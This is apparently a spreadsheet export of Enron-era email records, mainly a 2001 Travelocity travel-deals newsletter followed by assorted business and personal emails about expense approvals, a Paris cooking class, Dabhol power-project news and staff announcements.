? Save 15% off weekly and weekend rates with Budget._x000D_
Exclusive Offers_x000D_
? Win a Dream Texas Vacation!_x000D_
Exclusive Member Benefits_x000D_
? Introducing the Travelocity World MasterCard!_x000D_
? Travel Savings with the Travelocity Preferred Traveler Program_x000D_
Special Offers_x000D_
? Goodbye taxi lines. Goodbye shuttle buses. Say hello to_x000D_
??Limocenter.com._x000D_
? Fiji Islands Vacations On Sale Now!_x000D_
Site News_x000D_
? Free Issue of Travelocity Magazine_x000D_
Fare Watcher _x000D_
Traveler Reviews _x000D_
Travelocity Store_x000D_
_x000D_
_x000D_
***TRAVELER REVIEWS***_x000D_
_x000D_
Traveler Reviews_x000D_
Whether you've just had the perfect weekend away in Los Angeles, or _x000D_
you're searching for the best place to stay in Madrid or Lisbon, _x000D_
Traveler Reviews are for you. Get the insider's point of view from _x000D_
someone who has been there, or share your experience with fellow _x000D_
globetrotters with Travelocity's Traveler Reviews. _x000D_
_x000D_
Travelocity Store_x000D_
Bringing along the right travel gear makes a trip more comfortable, _x000D_
safe, and enjoyable. Our travel store offers a broad range of quality _x000D_
luggage and useful travel accessories for your next vacation or _x000D_
business trip. Shop now with an online company you know and _x000D_
trust--Travelocity.com. _x000D_
_x000D_
This is also a great time to try our Dream Maps, where you set your _x000D_
price and discover where it will take you in the U.S., Canada, _x000D_
Europe, or Caribbean! Find the "Modify Map" area on the Dream Maps _x000D_
page, then enter in your information. _x000D_
_x000D_
_x000D_
***FARE WATCHER*** _x000D_
_x000D_
Fare Watcher_x000D_
Keep track of changes in airfares to your favorite cities with Fare _x000D_
Watcher! Tell us the cities you're interested in, how long you want _x000D_
to track them, and how you want to be notified. Fare Watcher will do _x000D_
the rest! _x000D_
_x000D_
Low Fares Throughout the U.S.! Save $$ on Your Next Trip!_x000D_
Over the past two weeks we've watched as some small regional fare _x000D_
sales have grown to encompass the whole U.S.! The airlines have _x000D_
lowered fares, matched their competitors, and then matched them _x000D_
again, resulting in some of the lowest fares we've seen since _x000D_
January. The result? Now is a great time to book your late spring _x000D_
and summer travel. Just visit the Travelocity homepage, enter your _x000D_
preferred cities, and see what deals you can find! _x000D_
_x000D_
_x000D_
***FEATURED THIS WEEK***_x000D_
_x000D_
Introducing the Travelocity Preferred Traveler Program_x000D_
Airline club lounge passes, exclusive savings on select airfares, _x000D_
hotel and car-rental upgrades, discounts at thousands of restaurants _x000D_
nationwide, and much, much more. Experience travel as an insider from _x000D_
the company that knows it best. It's the ultimate upgrade. _x000D_
_x000D_
_x000D_
***AIRLINES***_x000D_
_x000D_
Save Big on Travel to Canada!_x000D_
Fly Air Canada from the U.S. to Canada and take advantage of great _x000D_
sale fares! Visit Toronto, Montreal, Vancouver, or one of 13 other _x000D_
destinations and enjoy Air Canada's superior service along the way. _x000D_
Tickets must be purchased by May 15, 2001 for travel completed by _x000D_
December 31, 2001. Air Canada is a member of the Star Alliance, _x000D_
which includes United Airlines, Lufthansa, Mexicana, and several _x000D_
other airlines. Book Now!_x000D_
_x000D_
Hot Fares to Central and South America!_x000D_
Have you ever wanted to visit Central or South America? Now is the _x000D_
time! Travelocity and GRUPO TACA are offering fantastic fares from _x000D_
eight U.S. gateway cities to 20 destinations. These sale fares are _x000D_
for travel originating from the U.S. between May 1 and June 15, 2001. _x000D_
Tickets must be purchased by May 31, 2001 so make your travel _x000D_
plans today!_x000D_
_x000D_
Qantas announces great fares to Australia!_x000D_
Travel from the U.S. starts at $769 round-trip for flights from Los _x000D_
Angeles or San Francisco to Sydney. Round-trip coach fare from New _x000D_
York or Newark is only $1069. Sale fares are offered to many _x000D_
Australian cities, including Brisbane, Cairns, and Melbourne. Tickets _x000D_
must be purchased by midnight CDT May 2, 2001. Travel must commence _x000D_
between April 15 and August 31,2001. The lowest fares are offered for _x000D_
travel on Trans-Pacific flights between May 3 - June 11, 2001 and _x000D_
July 12 - August 31, 2001. _x000D_
_x000D_
_x000D_
***VACATIONS***_x000D_
_x000D_
Visit Maui and Receive 20,000 Bonus Miles!_x000D_
From Molokai's beautiful sea cliffs to Lanai's timeless Garden of the _x000D_
Gods, the tri-isles of Maui will inspire you with their beauty. Come _x000D_
to a place where the people are warmer than the sun. Book a trip to _x000D_
Maui and receive 20,000 AAdvantage miles when you book a qualifying _x000D_
American Airlines Vacations package. _x000D_
_x000D_
$100 Disney Dollars at Walt Disney Orlando!_x000D_
Take the entire family to Orlando for warm days and fun-filled _x000D_
theme-park attractions. Delta Vacations is giving away $100 Disney _x000D_
Dollars! Choose from the list of Walt Disney properties and _x000D_
book today!_x000D_
_x000D_
Kids Under 12 Stay FREE at All-Inclusive Resort in Cancun!_x000D_
Kids stay free and a complimentary Mini Kids Club just for them? The _x000D_
Crown Paradise Resort in Cancun is making that possible. Just book a _x000D_
Travelocity Vacations package by May 13, 2001. _x000D_
_x000D_
More Vacation Deals_x000D_
_x000D_
_x000D_
***CRUISES***_x000D_
_x000D_
May Sailings from Seattle on Sale from $249!_x000D_
Rates don't get any lower than this! Take three or four nights off _x000D_
from everyday life and pamper yourself on Royal Caribbean's newest _x000D_
ship, the Radiance of the Seas! She'll depart Seattle this May for _x000D_
the charming British Columbia towns of Vancouver and Victoria for as _x000D_
little as $249. Book now!_x000D_
_x000D_
Depart from New York on a 7-Night Canada and New England Cruise _x000D_
for $479!_x000D_
This incredible price cannot be beat! Set sail from the Big Apple _x000D_
with Norwegian Cruise Line and head up the enchanting Atlantic _x000D_
Coast--from the seaside resorts of Martha's Vineyard to the quaint _x000D_
parks and gardens of Halifax, you're sure to enjoy this fantastic _x000D_
summer itinerary. Book now!_x000D_
_x000D_
7-Night Alaska Cruises this Spring and Summer from Only $549!_x000D_
Witness Alaska's amazing wildlife scenic beauty on an unforgettable _x000D_
seven-night Princess cruise. You'll explore the charming towns of _x000D_
Skagway, Juneau, Ketchikan, Haines, and the wilderness of Glacier _x000D_
Bay, where the spirit of Alaska comes alive. All for as little as _x000D_
$549! This incredible deal won't last long, so book now!_x000D_
_x000D_
Save 50% on a Luxurious Windstar Mediterranean Cruise!_x000D_
The canals of Venice, the casinos of Monte Carlo, and the _x000D_
picture-perfect beaches of Greece are calling! Take a spin through _x000D_
the Mediterranean in style with Windstar Cruises. They take pampering _x000D_
to a new level. Take advantage of these exclusive two-for-one _x000D_
rates--sailings start from $2565. Book now!_x000D_
_x000D_
More Cruise Deals_x000D_
_x000D_
_x000D_
***HOTELS***_x000D_
_x000D_
Luxor Las Vegas Resort and Casino_x000D_
Discover the secrets of the pyramid and experience luxury Egyptian _x000D_
style! Grab this hot deal today while the offer lasts, and take _x000D_
advantage of Free Admission at the Oasis Spa, plus more.... _x000D_
_x000D_
This April, $175 Buys You Unlimited Golf at the Doralc Golf _x000D_
Resort &amp; Spa_x000D_
This incredible golf package includes room, unlimited golf rounds, _x000D_
cart, golf clinic, breakfast, and more. Book your vacation today! _x000D_
_x000D_
Great Weekend Vacation Values_x000D_
Marriott and Renaissance Hotels have all sorts of great weekend value _x000D_
packages-romantic weekend getaways, fun-filled weekends with the _x000D_
kids, weekends in the city, or weekends at the beach. Click here_x000D_
for details. _x000D_
_x000D_
_x000D_
***RENT-A-CAR***_x000D_
_x000D_
Save 15% off weekly and weekend rates with Budget._x000D_
_x000D_
_x000D_
***EXCLUSIVE OFFERS***_x000D_
_x000D_
Win a Dream Texas Vacation!_x000D_
From metropolitan cities to old fashioned dude ranches, Texas has _x000D_
something for everyone. Enter the Giddyup Getaway Sweepstakes for _x000D_
your chance to win a deluxe Lone Star adventure. _x000D_
_x000D_
_x000D_
***EXCLUSIVE MEMBER BENEFITS***_x000D_
_x000D_
Introducing the Travelocity World MasterCard(R)!_x000D_
Earn Travelocity Rewards with each dollar you spend. And, with as _x000D_
little as 8,000 points, you'll be on your way to enjoying discounts _x000D_
and free travel on your Travelocity purchases. You'll earn $100 for _x000D_
every 8,000 points that can be used for airline tickets, rental cars, _x000D_
and hotel reservations. Apply today and earn 4,000 bonus points when _x000D_
you make your first transaction. _x000D_
_x000D_
Travel Savings with the Travelocity Preferred Traveler Program_x000D_
Sign up and receive exclusive savings including: 5% off Travelocity _x000D_
GoodBuy Fares, $25 cash back at Best Western Hotels, $15 off Hertz _x000D_
weekly rentals, $100 cash back on 7 night Holland America cruises, up _x000D_
to 20% off at 7,000 restaurants nationwide, 20% off purchases at the _x000D_
Travelocity Store, and much, much more. Get a free weekender bag _x000D_
when you become a Travelocity Preferred Traveler. Enroll today!_x000D_
_x000D_
_x000D_
***SPECIAL OFFERS***_x000D_
_x000D_
Goodbye taxi lines. Goodbye shuttle buses. Say hello to _x000D_
Limocenter.com._x000D_
You can arrange for Chauffeured Ground Transportation Service _x000D_
anywhere you may be traveling. Book now and save 50 percent on the _x000D_
second leg of your trip! _x000D_
_x000D_
Fiji Islands Vacations On Sale Now!_x000D_
Looking for a budget vacation, diving adventure, or a romantic getaway, _x000D_
Fiji has them all. From just $1252 - 7 nights/air/etc. Limited time _x000D_
offer requires booking now! Click here or call 800-579-FIJI. _x000D_
_x000D_
_x000D_
***SITE NEWS***_x000D_
_x000D_
FREE Issue of Travelocity Magazine!_x000D_
Explore exotic destinations and discover intriguing travel _x000D_
information and special deals. Don't miss one issue of Travelocity _x000D_
Magazine--get yours FREE!_x000D_
_x000D_
_x000D_
********* NEWS FROM OUR SPONSORS **********_x000D_
_x000D_
Scottsdale Convention &amp; Visitors Bureau_x000D_
From world-class golf to relaxing spas to award-winning chefs and _x000D_
restaurants, your vacation in Scottsdale, Arizona offers all the best _x000D_
of the American Southwest. Call toll-free 866-540-5208 or visit _x000D_
scottsdalecvb.com_x000D_
_x000D_
Don't Miss the Excitement of the Premier "An Elegant Affair," at the _x000D_
Luxurious Hyatt Lake Resort._x000D_
Rekindle your love at what many call the Cinderella Ball, or find _x000D_
your soul mate at the singles gala opening! _x000D_
_x000D_
_x000D_
Happy Travels! _x000D_
_x000D_
The Travelocity.com Team _x000D_
Go Virtually Anywhere! _x000D_
travelocity.com_x000D_
_x000D_
UNSUBSCRIBE _x000D_
When you registered at Travelocity or Preview Travel, you agreed to _x000D_
receive e-mail. If you would like to change your subscription _x000D_
preferences or if you received this message in error, please _x000D_
click below: _x000D_
http://travelocity1.m0.net/m/u/tty/t2.asp?e=lcampbel%40enron.com_x000D_
_x000D_
FORGOT YOUR PASSWORD? _x000D_
Password look-up--follow this link and we'll help you retrieve _x000D_
your password: _x000D_
http://travelocity1.m0.net/m/s.asp?HB3602171445X815302X62475X_x000D_
_x000D_
HOW DO I UPDATE MY E-MAIL? _x000D_
You may update your e-mail address within Your Account Preferences. _x000D_
Simply click on "Your Account" at the top of the home page and log in. _x000D_
http://travelocity1.m0.net/m/s.asp?HB3602171445X815303X62475X_x000D_
_x000D_
Travelocityc and Travelocity.com are trademarks of Travelocity.com LP _x000D_
and Sabrec is a trademark of an affiliate of Sabre Inc., 2000 _x000D_
Travelocity.com LP. All rights reserved. WB/WS _x000D_
#280 CST#2050374-40 _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
 </t>
  </si>
  <si>
    <t>Wed, 9 May 2001 09:50:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'pederleifkjeseth@hotmail.com'})</t>
  </si>
  <si>
    <t>jen's dad better buy a bunch of booze.  and the schrutt's better take us _x000D_
somewhere nice for the rehersal dinner.  and jen's friends better put out.</t>
  </si>
  <si>
    <t>Mon, 1 Oct 2001 05:48:24 -0700 (PDT)</t>
  </si>
  <si>
    <t>FW: Expense Reports Awaiting Your Approval</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	enron_update@concureworkplace.com@ENRON [mailto:IMCEANOTES-enron+5Fupdate+40concureworkplace+2Ecom+40ENRON@ENRON.com] _x000D_
Sent:	Monday, October 01, 2001 1:35 AM_x000D_
To:	Kitchen, Louise_x000D_
Subject:	Expense Reports Awaiting Your Approval_x000D_
_x000D_
The following reports have been waiting for your approval for more than 4 days.  Please review._x000D_
_x000D_
Owner: Robert Virgo_x000D_
Report Name: Sept 21st_x000D_
Days In Mgr. Queue: 4_x000D_
</t>
  </si>
  <si>
    <t>Thu, 1 Feb 2001 14:03:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'infocmb@cuisinemb.com'})</t>
  </si>
  <si>
    <t>Re: Tasting demonstration classes</t>
  </si>
  <si>
    <t>Please respond to infocmbDear Ms. Watson,_x000D_
We are most happy to welcome you and your group (9) ladies on Monday, 19_x000D_
February at 3:00 pm to 5:00 pm for a total of 3.000._x000D_
Our metro stop is : Ecole militaire, we are located near the Invalides and not_x000D_
too far from the Eiffel Tower._x000D_
We take credit card, but not American Express, only Visa._x000D_
Looking forward to meeting you and your group and thanking you again, I_x000D_
remain,_x000D_
Sincerely yours,_x000D_
Marie Blanche de Broglie_x000D_
_x000D_
Kimberly.Watson@enron.com a *crit :_x000D_
_x000D_
&gt; Dear Mme Marie-Blanche Broglie,_x000D_
&gt;_x000D_
&gt; Good news!   I have talked with each of the 9 ladies and we would like to_x000D_
&gt; book our tasting demonstration class with you for Monday, 19 February_x000D_
&gt; 3:00-5:00pm for a total of 3,000 FF.  Do you take American Express?  If so,_x000D_
&gt; I will send you my credit card number right away.  I forgot to ask you_x000D_
&gt; before, where are you located in Paris?  Which metro stop would we take?_x000D_
&gt; Many thanks for all of your help and my apologies for taking so long to_x000D_
&gt; coordinate with all of the ladies._x000D_
&gt;_x000D_
&gt; Sincerely,_x000D_
&gt;_x000D_
&gt; Kim Watson_x000D_
&gt; email:    kimberly.watson@enron.com_x000D_
&gt;      or_x000D_
&gt;      john.watson@pdq.net_x000D_
&gt;_x000D_
&gt; La Cuisine de Marie-Blanche &lt;infocmb@cuisinemb.com&gt; on 01/26/2001 01:55:05_x000D_
&gt; AM_x000D_
&gt;_x000D_
&gt; Please respond to infocmb@cuisinemb.com_x000D_
&gt;_x000D_
&gt; To:   Kimberly.Watson@enron.com_x000D_
&gt; cc:_x000D_
&gt;_x000D_
&gt; Subject:  Re: Tasting demonstration classes_x000D_
&gt;_x000D_
&gt; Dear Ms.Watson,_x000D_
&gt; We will be most happy to welcome your group of 9 ladies on February 19 from_x000D_
&gt; 3:00 to 5:00pm._x000D_
&gt; As regard the price, unfortunately the cost  remains the same ie 3.000 FF_x000D_
&gt; up_x000D_
&gt; to10 participants._x000D_
&gt; You may pay us now by credit card._x000D_
&gt; Looking forward to hearing from you, I remain,_x000D_
&gt; Sincerely yours,_x000D_
&gt; Marie-Blanche de Broglie_x000D_
&gt;_x000D_
&gt; Kimberly.Watson@enron.com a *crit :_x000D_
&gt;_x000D_
&gt; &gt; Dear Mme Marie-Blanche de Broglie,_x000D_
&gt; &gt;_x000D_
&gt; &gt; Please forgive my tardy response to the information you sent me on_x000D_
&gt; January_x000D_
&gt; &gt; 9 regarding a group of women for a tasting class (in english, please) on_x000D_
&gt; 19_x000D_
&gt; &gt; February, from 3:00 to 5:00 pm, 300 FF per person (minimum of 10 persons)_x000D_
&gt; ._x000D_
&gt; &gt; We have talked to all of the women and have 9 ladies who wish to_x000D_
&gt; &gt; participate in a tasting demonstration class.  We would very much like to_x000D_
&gt; &gt; participate in this type of event, would it be possible to still do the_x000D_
&gt; &gt; class for 9 ladies?  Do you have one or two persons who would like to_x000D_
&gt; take_x000D_
&gt; &gt; the class with us?  Would the cost change with either of these options?_x000D_
&gt; Do_x000D_
&gt; &gt; we pay now?  By credit card?_x000D_
&gt; &gt;_x000D_
&gt; &gt; Thank you so very much!_x000D_
&gt; &gt;_x000D_
&gt; &gt; Kim Watson_x000D_
&gt; &gt; email:    kwatson@enron.com_x000D_
&gt; &gt;      or_x000D_
&gt; &gt;      john.watson@pdq.net</t>
  </si>
  <si>
    <t>Mon, 30 Apr 2001 02:08:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>How is the new puppy?  It was a welcome break to play with your dogs Friday.  _x000D_
I think we should have dog breaks everyday!_x000D_
_x000D_
_x000D_
Debra Perlingiere_x000D_
Enron North America Corp._x000D_
Legal Department_x000D_
1400 Smith Street, EB 3885_x000D_
Houston, Texas 77002_x000D_
dperlin@enron.com_x000D_
Phone 713-853-7658_x000D_
Fax  713-646-3490</t>
  </si>
  <si>
    <t>Fri, 19 Jan 2001 09:12:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'sandeep.kohli@enron.com'})</t>
  </si>
  <si>
    <t>From the Enron India Newsdesk- Jan 18th newsclips</t>
  </si>
  <si>
    <t>Sandeep Kohli</t>
  </si>
  <si>
    <t xml:space="preserve">Vince,_x000D_
_x000D_
FYI._x000D_
---------------------- Forwarded by Sandeep Kohli/ENRON_DEVELOPMENT on=20_x000D_
01/19/2001 05:12 PM ---------------------------_x000D_
_x000D_
From the Enron India Newsdesk- Jan 18th newsclips_x000D_
_x000D_
_x000D_
_x000D_
Untie Them (Editorial)_x000D_
Thursday Jan 18 2001, http://www.economictimes.com/today/18edit02.htm_x000D_
---------------------------------------------------------------------------=_x000D_
---_x000D_
-------_x000D_
_x000D_
_x000D_
State not to give tax sops to DPC for buying naphtha from IOC, (Sanjay Jog)=_x000D_
=20_x000D_
 Thursday Jan 18=20_x000D_
2001,http://financialexpress.com/fe/daily/20010118/fec18056.html_x000D_
---------------------------------------------------------------------------=_x000D_
---_x000D_
-------_x000D_
_x000D_
Centre yet to receive proposal on Enron_x000D_
Thursday Jan 18 2001, http://www.economictimes.com/today/18infr02.htm_x000D_
=20_x000D_
---------------------------------------------------------------------------=_x000D_
---_x000D_
-------_x000D_
_x000D_
Untie Them (Editorial)_x000D_
Thursday Jan 18 2001_x000D_
_x000D_
THE GOVERNMENT of Maharashtra wants New Delhi to convince the Power Trading=_x000D_
=20_x000D_
Corporation, a central utility, to buy power from Dabhol and sell it across=_x000D_
=20_x000D_
the country.It would be far simpler if Dabhol  and all independent power=20_x000D_
producers  were allowed to sell power to whoever was willing to pay for=20_x000D_
it.That, unfortunately, is not allowed by law, which forces private sector=_x000D_
=20_x000D_
generators to sell power only to state utilities, which in turn, are not=20_x000D_
permitted to sell power across states on their own.=20_x000D_
_x000D_
Most state electricity boards are bankrupt . MSEB reportedly owes central=_x000D_
=20_x000D_
utilities Rs 5,000 crore. They cannot bring themselves to charge many types=_x000D_
=20_x000D_
of users for the power consumed, nor can they prevent large-scale theft of=_x000D_
=20_x000D_
electricity. Few, including wealthy Maharashtra, have the will to reform=20_x000D_
state electricity boards and privatise transmission and distribution. Given=_x000D_
=20_x000D_
this profile of buyers, private generators demand sovereign guarantees to=_x000D_
=20_x000D_
help them tide over default risks. But the guarantees merely insulate IPPs=_x000D_
=20_x000D_
against risk. They cannot make SEBs solvent. Yet, India needs power=20_x000D_
desperately. Maharashtra, India=01,s richest state, experiences power short=_x000D_
ages=20_x000D_
of around 2,000 MW, about a sixth of its peak needs.=20_x000D_
_x000D_
Over time, the hunger for power will only grow. India cannot afford to wait=_x000D_
=20_x000D_
for the painful politics of SEB reform to work themselves out. The governme=_x000D_
nt=20_x000D_
should bring in legislation that allows IPPs to sell power directly to payi=_x000D_
ng=20_x000D_
customers.This will free IPPs from the clutches of bankrupt monopsony buyer=_x000D_
s.=20_x000D_
The power trading legislation will have unexpectedly happy consequences for=_x000D_
=20_x000D_
the government too.Once IPPs are freed from their onerous obligations to se=_x000D_
ll=20_x000D_
power to single, mostly bankrupt buyers, their default risks will come down=_x000D_
=20_x000D_
substantially. New Delhi and state governments should then scrap the=20_x000D_
guarantees that they gave IPPs in the past.=20_x000D_
The combination of power trading, private investments in generation,=20_x000D_
transmission and distribution, and gradual SEB reform  will create a=20_x000D_
commercial, workable and competitive power market in India. Anything less=_x000D_
=20_x000D_
will be a recipe for disaster.=20_x000D_
_x000D_
---------------------------------------------------------------------------=_x000D_
---_x000D_
-------_x000D_
_x000D_
_x000D_
State not to give tax sops to DPC for buying naphtha from IOC, (Sanjay Jog)=_x000D_
=20_x000D_
 Thursday Jan 18 2001_x000D_
_x000D_
The Maharshtra government's finance department, which is striving to reduce=_x000D_
=20_x000D_
fiscal deficit from Rs 9,484 crore to Rs 3,484 crore by the beginning of=20_x000D_
April this year, has expressed its inability to provide a sales tax waiver =_x000D_
to=20_x000D_
the Dabhol Power Company (DPC) on the procurement of 1.2 million tonne of=_x000D_
=20_x000D_
naphtha from the state-run Indian Oil Corporation (IOC).=20_x000D_
_x000D_
Mantralaya sources told The Financial Express on Wednesday that DPC would=_x000D_
=20_x000D_
have to pay 4 per cent sales tax. "The government, way back in 1995, has=20_x000D_
modified the sales tax rate to 4 per cent to discourage the import of napht=_x000D_
ha=20_x000D_
from Gujarat by electrical companies operating in Maharashtra. The decision=_x000D_
=20_x000D_
was taken with a view to encouraging electrical companies to procure naphth=_x000D_
a=20_x000D_
at reduced rates within the state," government sources added. Sources said=_x000D_
=20_x000D_
that these companies had to pay nearly 15.3 per cent sales tax on naphtha=_x000D_
=20_x000D_
that was procured from Gujarat. However, following their representation, th=_x000D_
e=20_x000D_
government slashed the sales tax rate to 4 per cent._x000D_
=20_x000D_
The state finance department's opinion, which would be presented before the=_x000D_
=20_x000D_
state cabinet shortly in order to take a final decision, deserves special=_x000D_
=20_x000D_
significance especially when the state energy department and the loss-makin=_x000D_
g=20_x000D_
Maharashtra State Electricity Board (MSEB) have wholeheartedly supported th=_x000D_
e=20_x000D_
DPC's cause and recommended the sales tax waiver. DPC, which was asked by t=_x000D_
he=20_x000D_
Union ministry of oil and petroleum to procure naphtha within the country i=_x000D_
n=20_x000D_
view of excess availability, in its presentation to the state government an=_x000D_
d=20_x000D_
to MSEB, had made it clear that it would be left with no alternative but to=_x000D_
=20_x000D_
pass on the additional burden on the MSEB which would be ultimately passed =_x000D_
on=20_x000D_
to its consumers. DPC had also told the state government that it had not pa=_x000D_
id=20_x000D_
sales tax on the procurement of naphtha from Glencore in the calender year=_x000D_
=20_x000D_
2000.=20_x000D_
_x000D_
Sources from the state energy department and MSEB have stressed on the need=_x000D_
=20_x000D_
for such a waiver while expressing their inability to bear additional burde=_x000D_
n.=20_x000D_
They have suggested that the state should reciprocate by offering a sales t=_x000D_
ax=20_x000D_
exemption to DPC because the IOC, at the behest of the Centre, has tried to=_x000D_
=20_x000D_
match the international landing price of naphtha during the recently signed=_x000D_
=20_x000D_
memorandum of agreement with DPC. "If the state finance department sticks t=_x000D_
o=20_x000D_
its views, it may hurt the state as a whole," sources from the state energy=_x000D_
=20_x000D_
department and MSEB said.DPC will procure naphtha at Rs 11,050 per ton from=_x000D_
=20_x000D_
IOC during the calender year 2001 as compared to the Rs 10,050 per tonne=20_x000D_
price quoted by Glencore. The naphtha price comprises $175 per tonne free o=_x000D_
n=20_x000D_
board (FOB), 21.8 per cent of customs duty, 5.4 per cent of sales tax and=_x000D_
=20_x000D_
$18.87 of premium._x000D_
=20_x000D_
DPC senior vice president Mukesh Tyagi reiterated that the company has=20_x000D_
already made an appeal to the state government for the sales tax waiver on=_x000D_
=20_x000D_
naphtha in the larger interest of the consumers. "Sales tax is a pass throu=_x000D_
gh=20_x000D_
and MSEB, which will have to bear the additional burden, will pass it on th=_x000D_
e=20_x000D_
consumers," he added._x000D_
---------------------------------------------------------------------------=_x000D_
---_x000D_
-------_x000D_
_x000D_
_x000D_
Centre yet to receive proposal on Enron_x000D_
Thursday Jan 18 2001_x000D_
_x000D_
CENTRE on Wednesday said that it had not recevied any proposal from=20_x000D_
Maharashtra government seeking help to solve the tangle with the Enron=20_x000D_
promoted Dhabol Power Project relating to cost and surplus power. Asked abo=_x000D_
ut=20_x000D_
the reports that Maharashtra government was sending a proposal that centre=_x000D_
=20_x000D_
buy surplus power from Dhabol Power Company through power trading=20_x000D_
corporation, power minister Suresh Prabhu said "we have not received any=20_x000D_
proposal." "We are carefully watching the situation and will await a concre=_x000D_
te=20_x000D_
proposal before intervening in this matter," Parbhu said on the sidelines o=_x000D_
f=20_x000D_
greentech environment excellence awards ceremony, here. Asked whether there=_x000D_
=20_x000D_
was any possibility of the government asking the Power Trading Corporation =_x000D_
to=20_x000D_
buy power from the Dhabol Power Corporation, Prabhu replied "what will the=_x000D_
=20_x000D_
PTC do with the power?"=20_x000D_
_x000D_
Prabhu had earlier asked the state government to study the matter before=20_x000D_
approaching the centre for payment of dues. MSEB had earlier declined to pi=_x000D_
ck=20_x000D_
up its 15 per cent stake in phase II of the 1444 mw project. The Enron issu=_x000D_
e=20_x000D_
has been hanging fire with the Maharashtra State Electricity Board unable t=_x000D_
o=20_x000D_
clear the dues of DPC as a result of the skyrocketing prices of Naphtha=20_x000D_
infact MSEB has asked DPC to backdown completely leading to a situation whe=_x000D_
re=20_x000D_
DPC has stopped production at the facility from the begining of the=20_x000D_
month.State government has stepped in with support to the tune of Rs 114=20_x000D_
crore to enable MSEB to clear the dues for October. MSEB dues to DPC for=20_x000D_
November and December amount to over Rs 300 crores.=20_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 19 Dec 2001 08:14:54 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'amiser@natsource.com', 'tomd@amerexenergy.com', 'kbradley@tfsbrokers.com', 'john.borenius@gfinet.com', 'greg@apbenergy.com'})</t>
  </si>
  <si>
    <t>Quotes</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
In order to make sure that our records are complete during the holiday season, could you please forward a copy of your quote sheets to Chance Rabon at Chance.Rabon@enron.com, as well as sending them to me.  I will be on holidays from Friday 21st, till the end of the year and Chance will be helping clean up Enron business and be preparing for our business to re-emerge.  Your patients and help are greatly appreciated and I look forward to speaking with you in the new year._x000D_
_x000D_
Have a happy and safe holiday season._x000D_
_x000D_
Jon</t>
  </si>
  <si>
    <t>Wed, 22 Aug 2001 15:17:56 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'ray.alvarez@enron.com', 'e-mail &lt;.hedy@enron.com&gt;', 'alan.comnes@enron.com', 'tom.briggs@enron.com', 'steve.walton@enron.com', 'linda.robertson@enron.com', "earlene.o'connell@enron.com", 'karen.denne@enron.com', 'm..landwehr@enron.com', 'robert.neustaedter@enron.com', 'e-mail &lt;.sandra@enron.com&gt;', 'donna.fulton@enron.com', 'sarah.novosel@enron.com', 'dan.staines@enron.com', 'lisa.yoho@enron.com', 'steve.montovano@enron.com', 'ginger.dernehl@enron.com', 'paul.kaufman@enron.com', 'susan.mara@enron.com', 'richard.shapiro@enron.com', 'e-mail &lt;.rich@enron.com&gt;', 'jennifer.thome@enron.com', 'leslie.lawner@enron.com', 'd..steffes@enron.com', 'mary.schoen@enron.com', 'e-mail &lt;.ken@enron.com&gt;', 'jeff.keeler@enron.com', 'kathleen.sullivan@enron.com', 'janine.migden@enron.com', 'harry.kingerski@enron.com', 'robert.frank@enron.com', 'e-mail &lt;.scott@enron.com&gt;', 'e-mail &lt;.bev@enron.com&gt;', 'daniel.allegretti@enron.com', 'pr &lt;.palmer@enron.com&gt;', 'e-mail &lt;.joan@enron.com&gt;', 'elizabeth.linnell@enron.com', 'jeff.dasovich@enron.com', 'm..schmidt@enron.com', 'maureen.mcvicker@enron.com', 'j..noske@enron.com', 'jean.ryall@enron.com', 'stacey.bolton@enron.com'})</t>
  </si>
  <si>
    <t>California Campaign Closeout</t>
  </si>
  <si>
    <t xml:space="preserve">Attached is the presentation that Rick and Steve will make to Mr. Lay regarding our accomplishments during the California energy crisis.  _x000D_
 _x000D_
Great work everybody!!  _x000D_
 _x000D_
More to come on RTOs....._x000D_
 _x000D_
 _x000D_
 _x000D_
 _x000D_
 _x000D_
 </t>
  </si>
  <si>
    <t>Mon, 21 May 2001 09:53:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'kay.mann@enron.com', 'christi.nicolay@enron.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">Kay / Christi:_x000D_
_x000D_
We need to get a law firm reviewing this agreement as soon as possible. As _x000D_
Christi has worked with several on past projects, I thought she could help. _x000D_
Please let me know how we should proceed._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Ben_x000D_
---------------------- Forwarded by Ben Jacoby/HOU/ECT on 05/21/2001 02:57 PM _x000D_
---------------------------_x000D_
_x000D_
_x000D_
Greg Krause@ENRON_x000D_
05/21/2001 04:00 PM_x000D_
To: Christi L Nicolay/HOU/ECT@ECT_x000D_
cc: Ben Jacoby/HOU/ECT@ECT _x000D_
Subject: Midway Project - Generic Interconnect Agreement  _x000D_
_x000D_
Please see attached for your review and comments._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>frozenset({'archiving@enron.com'})</t>
  </si>
  <si>
    <t>Archive Log for 5/20/99 10:18:59 AM</t>
  </si>
  <si>
    <t xml:space="preserve"> Ferc total for 1997 by Desk (created by Mary Hain/HOU/ECT on 3/25/99)_x000D_
</t>
  </si>
  <si>
    <t>Tue, 15 May 2001 20:51:08 -0700 (PDT)</t>
  </si>
  <si>
    <t>Corrected Organization Announcement</t>
  </si>
  <si>
    <t xml:space="preserve"> Organization Announcement (Correction) _x000D_
_x000D_
I apologize for the confusion and inconvenience my mistake caused.  I had indicated that Kenneth Lovejoy would be supporting EES, but this is not correct.  Ken will be supporting  OEC.  Corrected announcement is provided below. _x000D_
_x000D_
 It is my pleasure to announce that Kenneth Lovejoy has joined Enron Corp. EH&amp;S Asset Operations.  He will be reporting directly to Donnie Willmann and  will support Central America, Caribbean and OEC.  Ken has over 25 year experience in environmental, health and safety for the oil and gas industry.   He has been working for Enron since 1996 and has extensive international experience.    We are excited to have Ken in our team so, please welcome Ken in his new role._x000D_
_x000D_
Henry  Van</t>
  </si>
  <si>
    <t>Mon, 28 Jan 2002 03:08:41 -0800 (PST)</t>
  </si>
  <si>
